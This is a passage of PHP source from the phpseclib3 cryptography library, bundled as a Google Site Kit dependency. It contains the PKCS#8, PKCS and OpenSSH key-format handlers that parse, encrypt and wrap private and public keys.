namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\AES; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DES; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RC2; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RC4; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\TripleDES; use Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; /** * PKCS#8 Formatted Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PKCS8 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS { /** * Default encryption algorithm * * @var string */ private static $defaultEncryptionAlgorithm = 'id-PBES2'; /** * Default encryption scheme * * Only used when defaultEncryptionAlgorithm is id-PBES2 * * @var string */ private static $defaultEncryptionScheme = 'aes128-CBC-PAD'; /** * Default PRF * * Only used when defaultEncryptionAlgorithm is id-PBES2 * * @var string */ private static $defaultPRF = 'id-hmacWithSHA256'; /** * Default Iteration Count * * @var int */ private static $defaultIterationCount = 2048; /** * OIDs loaded * * @var bool */ private static $oidsLoaded = \false; /** * Binary key flag * * @var bool */ private static $binary = \false; /** * Sets the default encryption algorithm * * @param string $algo */ public static function setEncryptionAlgorithm($algo) { self::$defaultEncryptionAlgorithm = $algo; } /** * Sets the default encryption algorithm for PBES2 * * @param string $algo */ public static function setEncryptionScheme($algo) { self::$defaultEncryptionScheme = $algo; } /** * Sets the iteration count * * @param int $count */ public static function setIterationCount($count) { self::$defaultIterationCount = $count; } /** * Sets the PRF for PBES2 * * @param string $algo */ public static function setPRF($algo) { self::$defaultPRF = $algo; } /** * Returns a SymmetricKey object based on a PBES1 $algo * * @return \phpseclib3\Crypt\Common\SymmetricKey * @param string $algo */ private static function getPBES1EncryptionObject($algo) { $algo = \preg_match('#^pbeWith(?:MD2|MD5|SHA1|SHA)And(.*?)-CBC$#', $algo, $matches) ? $matches[1] : \substr($algo, 13); // strlen('pbeWithSHAAnd') == 13 switch ($algo) { case 'DES': $cipher = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DES('cbc'); break; case 'RC2': $cipher = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RC2('cbc'); $cipher->setKeyLength(64); break; case '3-KeyTripleDES': $cipher = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\TripleDES('cbc'); break; case '2-KeyTripleDES': $cipher = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\TripleDES('cbc'); $cipher->setKeyLength(128); break; case '128BitRC2': $cipher = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RC2('cbc'); $cipher->setKeyLength(128); break; case '40BitRC2': $cipher = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RC2('cbc'); $cipher->setKeyLength(40); break; case '128BitRC4': $cipher = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RC4(); $cipher->setKeyLength(128); break; case '40BitRC4': $cipher = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RC4(); $cipher->setKeyLength(40); break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException("{$algo} is not a supported algorithm"); } return $cipher; } /** * Returns a hash based on a PBES1 $algo * * @return string * @param string $algo */ private static function getPBES1Hash($algo) { if (\preg_match('#^pbeWith(MD2|MD5|SHA1|SHA)And.*?-CBC$#', $algo, $matches)) { return $matches[1] == 'SHA' ? 'sha1' : $matches[1]; } return 'sha1'; } /** * Returns a KDF baesd on a PBES1 $algo * * @return string * @param string $algo */ private static function getPBES1KDF($algo) { switch ($algo) { case 'pbeWithMD2AndDES-CBC': case 'pbeWithMD2AndRC2-CBC': case 'pbeWithMD5AndDES-CBC': case 'pbeWithMD5AndRC2-CBC': case 'pbeWithSHA1AndDES-CBC': case 'pbeWithSHA1AndRC2-CBC': return 'pbkdf1'; } return 'pkcs12'; } /** * Returns a SymmetricKey object baesd on a PBES2 $algo * * @return SymmetricKey * @param string $algo */ private static function getPBES2EncryptionObject($algo) { switch ($algo) { case 'desCBC': $cipher = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DES('cbc'); break; case 'des-EDE3-CBC': $cipher = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\TripleDES('cbc'); break; case 'rc2CBC': $cipher = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RC2('cbc'); // in theory this can be changed $cipher->setKeyLength(128); break; case 'rc5-CBC-PAD': throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('rc5-CBC-PAD is not supported for PBES2 PKCS#8 keys'); case 'aes128-CBC-PAD': case 'aes192-CBC-PAD': case 'aes256-CBC-PAD': $cipher = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\AES('cbc'); $cipher->setKeyLength(\substr($algo, 3, 3)); break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException("{$algo} is not supported"); } return $cipher; } /** * Initialize static variables * */ private static function initialize_static_variables() { if (!isset(static::$childOIDsLoaded)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('This class should not be called directly'); } if (!static::$childOIDsLoaded) { \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::loadOIDs(\is_array(static::OID_NAME) ? \array_combine(static::OID_NAME, static::OID_VALUE) : [static::OID_NAME => static::OID_VALUE]); static::$childOIDsLoaded = \true; } if (!self::$oidsLoaded) { // from https://tools.ietf.org/html/rfc2898 \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::loadOIDs([ // PBES1 encryption schemes 'pbeWithMD2AndDES-CBC' => '1.2.840.113549.1.5.1', 'pbeWithMD2AndRC2-CBC' => '1.2.840.113549.1.5.4', 'pbeWithMD5AndDES-CBC' => '1.2.840.113549.1.5.3', 'pbeWithMD5AndRC2-CBC' => '1.2.840.113549.1.5.6', 'pbeWithSHA1AndDES-CBC' => '1.2.840.113549.1.5.10', 'pbeWithSHA1AndRC2-CBC' => '1.2.840.113549.1.5.11', // from PKCS#12: // https://tools.ietf.org/html/rfc7292 'pbeWithSHAAnd128BitRC4' => '1.2.840.113549.1.12.1.1', 'pbeWithSHAAnd40BitRC4' => '1.2.840.113549.1.12.1.2', 'pbeWithSHAAnd3-KeyTripleDES-CBC' => '1.2.840.113549.1.12.1.3', 'pbeWithSHAAnd2-KeyTripleDES-CBC' => '1.2.840.113549.1.12.1.4', 'pbeWithSHAAnd128BitRC2-CBC' => '1.2.840.113549.1.12.1.5', 'pbeWithSHAAnd40BitRC2-CBC' => '1.2.840.113549.1.12.1.6', 'id-PBKDF2' => '1.2.840.113549.1.5.12', 'id-PBES2' => '1.2.840.113549.1.5.13', 'id-PBMAC1' => '1.2.840.113549.1.5.14', // from PKCS#5 v2.1: // http://www.rsa.com/rsalabs/pkcs/files/h11302-wp-pkcs5v2-1-password-based-cryptography-standard.pdf 'id-hmacWithSHA1' => '1.2.840.113549.2.7', 'id-hmacWithSHA224' => '1.2.840.113549.2.8', 'id-hmacWithSHA256' => '1.2.840.113549.2.9', 'id-hmacWithSHA384' => '1.2.840.113549.2.10', 'id-hmacWithSHA512' => '1.2.840.113549.2.11', 'id-hmacWithSHA512-224' => '1.2.840.113549.2.12', 'id-hmacWithSHA512-256' => '1.2.840.113549.2.13', 'desCBC' => '1.3.14.3.2.7', 'des-EDE3-CBC' => '1.2.840.113549.3.7', 'rc2CBC' => '1.2.840.113549.3.2', 'rc5-CBC-PAD' => '1.2.840.113549.3.9', 'aes128-CBC-PAD' => '2.16.840.1.101.3.4.1.2', 'aes192-CBC-PAD' => '2.16.840.1.101.3.4.1.22', 'aes256-CBC-PAD' => '2.16.840.1.101.3.4.1.42', ]); self::$oidsLoaded = \true; } } /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ protected static function load($key, $password = '') { if (!\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . \gettype($key)); } $isPublic = \strpos($key, 'PUBLIC') !== \false; $isPrivate = \strpos($key, 'PRIVATE') !== \false; $decoded = self::preParse($key); $meta = []; $decrypted = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\EncryptedPrivateKeyInfo::MAP); if (\strlen($password) && \is_array($decrypted)) { $algorithm = $decrypted['encryptionAlgorithm']['algorithm']; switch ($algorithm) { // PBES1 case 'pbeWithMD2AndDES-CBC': case 'pbeWithMD2AndRC2-CBC': case 'pbeWithMD5AndDES-CBC': case 'pbeWithMD5AndRC2-CBC': case 'pbeWithSHA1AndDES-CBC': case 'pbeWithSHA1AndRC2-CBC': case 'pbeWithSHAAnd3-KeyTripleDES-CBC': case 'pbeWithSHAAnd2-KeyTripleDES-CBC': case 'pbeWithSHAAnd128BitRC2-CBC': case 'pbeWithSHAAnd40BitRC2-CBC': case 'pbeWithSHAAnd128BitRC4': case 'pbeWithSHAAnd40BitRC4': $cipher = self::getPBES1EncryptionObject($algorithm); $hash = self::getPBES1Hash($algorithm); $kdf = self::getPBES1KDF($algorithm); $meta['meta']['algorithm'] = $algorithm; $temp = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($decrypted['encryptionAlgorithm']['parameters']); if (!$temp) { throw new \RuntimeException('Unable to decode BER'); } \extract(\Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($temp[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PBEParameter::MAP)); $iterationCount = (int) $iterationCount->toString(); $cipher->setPassword($password, $kdf, $hash, $salt, $iterationCount); $key = $cipher->decrypt($decrypted['encryptedData']); $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($key); if (!$decoded) { throw new \RuntimeException('Unable to decode BER 2'); } break; case 'id-PBES2': $meta['meta']['algorithm'] = $algorithm; $temp = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($decrypted['encryptionAlgorithm']['parameters']); if (!$temp) { throw new \RuntimeException('Unable to decode BER'); } $temp = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($temp[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PBES2params::MAP); \extract($temp); $cipher = self::getPBES2EncryptionObject($encryptionScheme['algorithm']); $meta['meta']['cipher'] = $encryptionScheme['algorithm']; $temp = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($decrypted['encryptionAlgorithm']['parameters']); if (!$temp) { throw new \RuntimeException('Unable to decode BER'); } $temp = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($temp[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PBES2params::MAP); \extract($temp); if (!$cipher instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RC2) { $cipher->setIV($encryptionScheme['parameters']['octetString']); } else { $temp = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($encryptionScheme['parameters']); if (!$temp) { throw new \RuntimeException('Unable to decode BER'); } \extract(\Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($temp[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\RC2CBCParameter::MAP)); $effectiveKeyLength = (int) $rc2ParametersVersion->toString(); switch ($effectiveKeyLength) { case 160: $effectiveKeyLength = 40; break; case 120: $effectiveKeyLength = 64; break; case 58: $effectiveKeyLength = 128; break; } $cipher->setIV($iv); $cipher->setKeyLength($effectiveKeyLength); } $meta['meta']['keyDerivationFunc'] = $keyDerivationFunc['algorithm']; switch ($keyDerivationFunc['algorithm']) { case 'id-PBKDF2': $temp = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($keyDerivationFunc['parameters']); if (!$temp) { throw new \RuntimeException('Unable to decode BER'); } $prf = ['algorithm' => 'id-hmacWithSHA1']; $params = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($temp[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PBKDF2params::MAP); \extract($params); $meta['meta']['prf'] = $prf['algorithm']; $hash = \str_replace('-', '/', \substr($prf['algorithm'], 11)); $params = [$password, 'pbkdf2', $hash, $salt, (int) $iterationCount->toString()]; if (isset($keyLength)) { $params[] = (int) $keyLength->toString(); } $cipher->setPassword(...$params); $key = $cipher->decrypt($decrypted['encryptedData']); $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($key); if (!$decoded) { throw new \RuntimeException('Unable to decode BER 3'); } break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('Only PBKDF2 is supported for PBES2 PKCS#8 keys'); } break; case 'id-PBMAC1': //$temp = ASN1::decodeBER($decrypted['encryptionAlgorithm']['parameters']); //$value = ASN1::asn1map($temp[0], Maps\PBMAC1params::MAP); // since i can't find any implementation that does PBMAC1 it is unsupported throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('Only PBES1 and PBES2 PKCS#8 keys are supported.'); } } $private = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\OneAsymmetricKey::MAP); if (\is_array($private)) { if ($isPublic) { throw new \UnexpectedValueException('Human readable string claims public key but DER encoded string claims private key'); } if (isset($private['privateKeyAlgorithm']['parameters']) && !$private['privateKeyAlgorithm']['parameters'] instanceof \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element && isset($decoded[0]['content'][1]['content'][1])) { $temp = $decoded[0]['content'][1]['content'][1]; $private['privateKeyAlgorithm']['parameters'] = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element(\substr($key, $temp['start'], $temp['length'])); } if (\is_array(static::OID_NAME)) { if (!\in_array($private['privateKeyAlgorithm']['algorithm'], static::OID_NAME)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException($private['privateKeyAlgorithm']['algorithm'] . ' is not a supported key type'); } } else { if ($private['privateKeyAlgorithm']['algorithm'] != static::OID_NAME) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('Only ' . static::OID_NAME . ' keys are supported; this is a ' . $private['privateKeyAlgorithm']['algorithm'] . ' key'); } } if (isset($private['publicKey'])) { if ($private['publicKey'][0] != "\x00") { throw new \UnexpectedValueException('The first byte of the public key should be null - not ' . \bin2hex($private['publicKey'][0])); } $private['publicKey'] = \substr($private['publicKey'], 1); } return $private + $meta; } // EncryptedPrivateKeyInfo and PublicKeyInfo have largely identical "signatures". the only difference // is that the former has an octet string and the later has a bit string. the first byte of a bit // string represents the number of bits in the last byte that are to be ignored but, currently, // bit strings wanting a non-zero amount of bits trimmed are not supported $public = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PublicKeyInfo::MAP); if (\is_array($public)) { if ($isPrivate) { throw new \UnexpectedValueException('Human readable string claims private key but DER encoded string claims public key'); } if ($public['publicKey'][0] != "\x00") { throw new \UnexpectedValueException('The first byte of the public key should be null - not ' . \bin2hex($public['publicKey'][0])); } if (\is_array(static::OID_NAME)) { if (!\in_array($public['publicKeyAlgorithm']['algorithm'], static::OID_NAME)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException($public['publicKeyAlgorithm']['algorithm'] . ' is not a supported key type'); } } else { if ($public['publicKeyAlgorithm']['algorithm'] != static::OID_NAME) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('Only ' . static::OID_NAME . ' keys are supported; this is a ' . $public['publicKeyAlgorithm']['algorithm'] . ' key'); } } if (isset($public['publicKeyAlgorithm']['parameters']) && !$public['publicKeyAlgorithm']['parameters'] instanceof \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element && isset($decoded[0]['content'][0]['content'][1])) { $temp = $decoded[0]['content'][0]['content'][1]; $public['publicKeyAlgorithm']['parameters'] = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element(\substr($key, $temp['start'], $temp['length'])); } $public['publicKey'] = \substr($public['publicKey'], 1); return $public; } throw new \RuntimeException('Unable to parse using either OneAsymmetricKey or PublicKeyInfo ASN1 maps'); } /** * Toggle between binary (DER) and printable (PEM) keys * * Printable keys are what are generated by default. * * @param bool $enabled */ public static function setBinaryOutput($enabled) { self::$binary = $enabled; } /** * Wrap a private key appropriately * * @param string $key * @param string $attr * @param mixed $params * @param string $password * @param string $oid optional * @param string $publicKey optional * @param array $options optional * @return string */ protected static function wrapPrivateKey($key, $attr, $params, $password, $oid = null, $publicKey = '', array $options = []) { self::initialize_static_variables(); $key = ['version' => 'v1', 'privateKeyAlgorithm' => ['algorithm' => \is_string(static::OID_NAME) ? static::OID_NAME : $oid], 'privateKey' => $key]; if ($oid != 'id-Ed25519' && $oid != 'id-Ed448') { $key['privateKeyAlgorithm']['parameters'] = $params; } if (!empty($attr)) { $key['attributes'] = $attr; } if (!empty($publicKey)) { $key['version'] = 'v2'; $key['publicKey'] = $publicKey; } $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($key, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\OneAsymmetricKey::MAP); if (!empty($password) && \is_string($password)) { $salt = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string(8); $iterationCount = isset($options['iterationCount']) ? $options['iterationCount'] : self::$defaultIterationCount; $encryptionAlgorithm = isset($options['encryptionAlgorithm']) ? $options['encryptionAlgorithm'] : self::$defaultEncryptionAlgorithm; $encryptionScheme = isset($options['encryptionScheme']) ? $options['encryptionScheme'] : self::$defaultEncryptionScheme; $prf = isset($options['PRF']) ? $options['PRF'] : self::$defaultPRF; if ($encryptionAlgorithm == 'id-PBES2') { $crypto = self::getPBES2EncryptionObject($encryptionScheme); $hash = \str_replace('-', '/', \substr($prf, 11)); $kdf = 'pbkdf2'; $iv = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string($crypto->getBlockLength() >> 3); $PBKDF2params = ['salt' => $salt, 'iterationCount' => $iterationCount, 'prf' => ['algorithm' => $prf, 'parameters' => null]]; $PBKDF2params = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($PBKDF2params, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PBKDF2params::MAP); if (!$crypto instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RC2) { $params = ['octetString' => $iv]; } else { $params = ['rc2ParametersVersion' => 58, 'iv' => $iv]; $params = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($params, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\RC2CBCParameter::MAP); $params = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element($params); } $params = ['keyDerivationFunc' => ['algorithm' => 'id-PBKDF2', 'parameters' => new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element($PBKDF2params)], 'encryptionScheme' => ['algorithm' => $encryptionScheme, 'parameters' => $params]]; $params = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($params, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PBES2params::MAP); $crypto->setIV($iv); } else { $crypto = self::getPBES1EncryptionObject($encryptionAlgorithm); $hash = self::getPBES1Hash($encryptionAlgorithm); $kdf = self::getPBES1KDF($encryptionAlgorithm); $params = ['salt' => $salt, 'iterationCount' => $iterationCount]; $params = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($params, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PBEParameter::MAP); } $crypto->setPassword($password, $kdf, $hash, $salt, $iterationCount); $key = $crypto->encrypt($key); $key = ['encryptionAlgorithm' => ['algorithm' => $encryptionAlgorithm, 'parameters' => new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element($params)], 'encryptedData' => $key]; $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($key, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\EncryptedPrivateKeyInfo::MAP); if (isset($options['binary']) ? $options['binary'] : self::$binary) { return $key; } return "-----BEGIN ENCRYPTED PRIVATE KEY-----\r\n" . \chunk_split(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($key), 64) . "-----END ENCRYPTED PRIVATE KEY-----"; } if (isset($options['binary']) ? $options['binary'] : self::$binary) { return $key; } return "-----BEGIN PRIVATE KEY-----\r\n" . \chunk_split(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($key), 64) . "-----END PRIVATE KEY-----"; } /** * Wrap a public key appropriately * * @param string $key * @param mixed $params * @param string $oid * @return string */ protected static function wrapPublicKey($key, $params, $oid = null, array $options = []) { self::initialize_static_variables(); $key = ['publicKeyAlgorithm' => ['algorithm' => \is_string(static::OID_NAME) ? static::OID_NAME : $oid], 'publicKey' => "\x00" . $key]; if ($oid != 'id-Ed25519' && $oid != 'id-Ed448') { $key['publicKeyAlgorithm']['parameters'] = $params; } $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($key, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PublicKeyInfo::MAP); if (isset($options['binary']) ? $options['binary'] : self::$binary) { return $key; } return "-----BEGIN PUBLIC KEY-----\r\n" . \chunk_split(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($key), 64) . "-----END PUBLIC KEY-----"; } /** * Perform some preliminary parsing of the key * * @param string $key * @return array */ private static function preParse(&$key) { self::initialize_static_variables(); if (self::$format != self::MODE_DER) { $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::extractBER($key); if ($decoded !== \false) { $key = $decoded; } elseif (self::$format == self::MODE_PEM) { throw new \UnexpectedValueException('Expected base64-encoded PEM format but was unable to decode base64 text'); } } $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($key); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } return $decoded; } /** * Returns the encryption parameters used by the key * * @param string $key * @return array */ public static function extractEncryptionAlgorithm($key) { if (!\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . \gettype($key)); } $decoded = self::preParse($key); $r = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\EncryptedPrivateKeyInfo::MAP); if (!\is_array($r)) { throw new \RuntimeException('Unable to parse using EncryptedPrivateKeyInfo map'); } if ($r['encryptionAlgorithm']['algorithm'] == 'id-PBES2') { $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($r['encryptionAlgorithm']['parameters']->element); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $r['encryptionAlgorithm']['parameters'] = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PBES2params::MAP); $kdf =& $r['encryptionAlgorithm']['parameters']['keyDerivationFunc']; switch ($kdf['algorithm']) { case 'id-PBKDF2': $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($kdf['parameters']->element); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $kdf['parameters'] = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PBKDF2params::MAP); } } return $r['encryptionAlgorithm']; } } <?php /** * PKCS Formatted Key Handler * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys; /** * PKCS1 Formatted Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PKCS { /** * Auto-detect the format */ const MODE_ANY = 0; /** * Require base64-encoded PEM's be supplied */ const MODE_PEM = 1; /** * Require raw DER's be supplied */ const MODE_DER = 2; /**#@-*/ /** * Is the key a base-64 encoded PEM, DER or should it be auto-detected? * * @var int */ protected static $format = self::MODE_ANY; /** * Require base64-encoded PEM's be supplied * */ public static function requirePEM() { self::$format = self::MODE_PEM; } /** * Require raw DER's be supplied * */ public static function requireDER() { self::$format = self::MODE_DER; } /** * Accept any format and auto detect the format * * This is the default setting * */ public static function requireAny() { self::$format = self::MODE_ANY; } } <?php /** * OpenSSH Key Handler * * PHP version 5 * * Place in $HOME/.ssh/authorized_keys * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\AES; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadDecryptionException; /** * OpenSSH Formatted RSA Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class OpenSSH { /** * Default comment * * @var string */ protected static $comment = 'phpseclib-generated-key'; /** * Binary key flag * * @var bool */ protected static $binary = \false; /** * Sets the default comment * * @param string $comment */ public static function setComment($comment) { self::$comment = \str_replace(["\r", "\n"], '', $comment); } /** * Break a public or private key down into its constituent components * * $type can be either ssh-dss or ssh-rsa * * @param string $key * @param string $password * @return array */ public static function load($key, $password = '') { if (!\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . \gettype($key)); } // key format is described here: // https://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/PROTOCOL.key?annotate=HEAD if (\strpos($key, 'BEGIN OPENSSH PRIVATE KEY') !== \false) { $key = \preg_replace('#(?:^-.*?-[\\r\\n]*$)|\\s#ms', '', $key); $key = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_decode($key); $magic = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($key, 15); if ($magic != "openssh-key-v1\x00") { throw new \RuntimeException('Expected openssh-key-v1'); } list($ciphername, $kdfname, $kdfoptions, $numKeys) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('sssN', $key); if ($numKeys != 1) { // if we wanted to support multiple keys we could update PublicKeyLoader to preview what the # of keys // would be; it'd then call Common\Keys\OpenSSH.php::load() and get the paddedKey. it'd then pass // that to the appropriate key loading parser $numKey times or something throw new \RuntimeException('Although the OpenSSH private key format supports multiple keys phpseclib does not'); } switch ($ciphername) { case 'none': break; case 'aes256-ctr': if ($kdfname != 'bcrypt') { throw new \RuntimeException('Only the bcrypt kdf is supported (' . $kdfname . ' encountered)'); } list($salt, $rounds) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('sN', $kdfoptions); $crypto = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\AES('ctr'); //$crypto->setKeyLength(256); //$crypto->disablePadding(); $crypto->setPassword($password, 'bcrypt', $salt, $rounds, 32); break; default: throw new \RuntimeException('The only supported ciphers are: none, aes256-ctr (' . $ciphername . ' is being used)'); } list($publicKey, $paddedKey) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('ss', $key); list($type) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $publicKey); if (isset($crypto)) { $paddedKey = $crypto->decrypt($paddedKey); } list($checkint1, $checkint2) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('NN', $paddedKey); // any leftover bytes in $paddedKey are for padding? but they should be sequential bytes. eg. 1, 2, 3, etc. if ($checkint1 != $checkint2) { if (isset($crypto)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadDecryptionException('Unable to decrypt key - please verify the password you are using'); } throw new \RuntimeException("The two checkints do not match ({$checkint1} vs. {$checkint2})"); } self::checkType($type); return \compact('type', 'publicKey', 'paddedKey'); } $parts = \explode(' ', $key, 3); if (!isset($parts[1])) { $key = \base64_decode($parts[0]); $comment = \false; } else { $asciiType = $parts[0]; self::checkType($parts[0]); $key = \base64_decode($parts[1]); $comment = isset($parts[2]) ? $parts[2] : \false; } if ($key === \false) { throw new \UnexpectedValueException('Key should be a string - not a ' . \gettype($key)); } list($type) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $key); self::checkType($type); if (isset($asciiType) && $asciiType != $type) { throw new \RuntimeException('Two different types of keys are claimed: ' . $asciiType . ' and ' . $type); } if (\strlen($key) <= 4) { 